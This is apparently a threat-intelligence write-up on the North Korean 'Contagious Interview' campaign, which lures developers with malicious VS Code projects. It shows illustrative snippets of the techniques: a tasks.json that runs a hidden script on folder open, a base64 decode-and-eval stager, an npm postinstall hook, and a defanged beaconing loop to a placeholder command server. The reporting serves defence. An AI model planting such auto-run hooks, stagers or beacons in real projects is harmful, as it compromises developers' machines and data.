
North Korean Hackers Exploit Developers' Trust in Visual Studio Code

Jan 21

Key Findings


  • North Korean threat actors associated with the "Contagious Interview" campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints.

  • The attack involves instructing targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.

  • The malicious VS Code task configuration files are used to execute payloads, including a backdoor implant that provides remote code execution capabilities.

  • Sophisticated multi-stage droppers have been found hidden in the task configuration files, disguised as harmless spell-check dictionaries.

  • The campaign has evolved to use a previously undocumented infection method that leverages the Node.js ecosystem to deploy a highly capable backdoor.

  • The malware has features such as beaconing to a command-and-control server every 5 seconds, executing additional JavaScript, and cleaning up traces of its activity.

  • The code shows signs of being generated with the help of AI tools, with inline comments and phrasing consistent with AI-assisted development.


Background


The North Korean threat actors behind the long-running "Contagious Interview" campaign have been targeting software engineers, particularly those working in the cryptocurrency, blockchain, and fintech sectors, because these developers often hold privileged access to financial assets, digital wallets, and technical infrastructure.


Malicious VS Code Projects


The latest attacks use malicious VS Code projects as lures to deliver a backdoor onto compromised endpoints. The infection chain starts when the victim clones a malicious Git repository and opens it in VS Code. The editor then automatically processes the repository's `tasks.json` configuration file, leading to the execution of the arbitrary commands embedded in it.
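
For illustration only, the sketch below shows how a VS Code `tasks.json` can be configured to run a command automatically when a folder is opened, via the `"runOn": "folderOpen"` option; the label and script path are invented placeholders, not indicators from this campaign, and VS Code's Workspace Trust prompt is the main built-in safeguard against this pattern.

```jsonc
// Illustrative sketch only -- not the attackers' actual configuration.
// A task with "runOn": "folderOpen" executes as soon as the folder is opened
// (in a trusted workspace), with no further action from the developer.
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Prepare workspace",            // innocuous-looking name
      "type": "shell",
      "command": "node",
      "args": [".vscode/setup.js"],            // hypothetical first-stage script
      "runOptions": { "runOn": "folderOpen" }, // auto-run on folder open
      "presentation": { "reveal": "never" }    // keep the terminal hidden
    }
  ]
}
```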


Sophisticated Droppers


Subsequent iterations of the campaign have been found to conceal sophisticated multi-stage droppers in the task configuration files, disguising the malware as harmless spell-check dictionaries. The obfuscated JavaScript embedded in these files is executed as soon as the victim opens the project in the IDE.
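
As a purely hypothetical illustration of that staging idea (not the campaign's actual dropper or obfuscation), the snippet below shows how content that reads like inert data can become code once it is joined, decoded, and evaluated:

```javascript
// Hypothetical staging sketch -- placeholder strings, not real campaign artifacts.
// Innocuous-looking "dictionary" entries are concatenated, base64-decoded,
// and then evaluated as JavaScript.
const entries = ["Y29uc29s", "ZS5sb2co", "Im5leHQg", "c3RhZ2Ui", "KQ=="];

const decoded = Buffer.from(entries.join(""), "base64").toString("utf8");
// decoded now holds: console.log("next stage")
eval(decoded); // real droppers chain several decode-and-execute stages like this
```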


Node.js Infection Method


Researchers have also identified a previously undocumented infection method that takes advantage of the Node.js ecosystem. This technique plants malicious code that executes when a developer runs the standard `npm install` command.
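
One plausible shape for this, sketched below with invented package and script names, is an npm lifecycle script: npm automatically runs a package's `postinstall` script after `npm install` completes, so any command placed there executes with the developer's privileges.

```json
{
  "name": "coding-assessment",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node ./scripts/bootstrap.js"
  }
}
```

Here `./scripts/bootstrap.js` stands in for a first-stage loader; whether this campaign uses `postinstall` specifically or another part of the install flow is not detailed in the public reporting.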


Highly Capable Backdoor


The final-stage payload delivered in these attacks is a highly capable backdoor that beacons to a command-and-control server every 5 seconds, sending system details and waiting for instructions. It can execute additional JavaScript sent by the operators and, on command, shut down itself and its child processes while cleaning up traces of its activity.
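
To make that behaviour concrete, here is a heavily defanged sketch of such a beaconing loop (placeholder C2 address and field names; the remote-execution step is reduced to a comment), assuming Node.js 18+ for the built-in `fetch`:

```javascript
// Defanged sketch of the reported beaconing pattern -- not the actual implant.
const os = require("os");

const C2_URL = "https://c2.example.invalid/beacon"; // placeholder address

async function beacon() {
  // Basic host profile of the kind an implant typically reports.
  const profile = {
    host: os.hostname(),
    platform: os.platform(),
    user: os.userInfo().username,
  };
  try {
    const res = await fetch(C2_URL, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(profile),
    });
    const task = await res.json();
    if (task && task.js) {
      // The real backdoor reportedly evaluates JavaScript returned by the server;
      // shown here only as a comment -- never execute untrusted code.
    }
  } catch (_) {
    // Swallow errors and keep beaconing on the next interval.
  }
}

setInterval(beacon, 5000); // check in every 5 seconds, as reported
```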


AI-Assisted Code


Interestingly, the malware's code shows signs of having been generated with the help of AI tools, with inline comments and phrasing consistent with AI-assisted development.


Sources


  • https://thehackernews.com/2026/01/north-korea-linked-hackers-target.html

  • https://securityonline.info/contagious-code-north-korean-hackers-infiltrate-developer-workflows-via-visual-studio-code/

  • https://www.abit.ee/en/cybersecurity/hackers-and-attacks/north-korea-hackers-vs-code-developers-contagious-interview-beavertail-invisibleferret-cybersecurity-en

  • https://fridaysecurity.org/news/north-korea-linked-hackers-target-developers-via-malicious-vs-code-projects

  • https://phemex.com/news/article/north-korean-hackers-developer-attack-method-traced-back-to-github-repository-54881

  • https://x.com/TheHackersNews/status/2013683371474387188
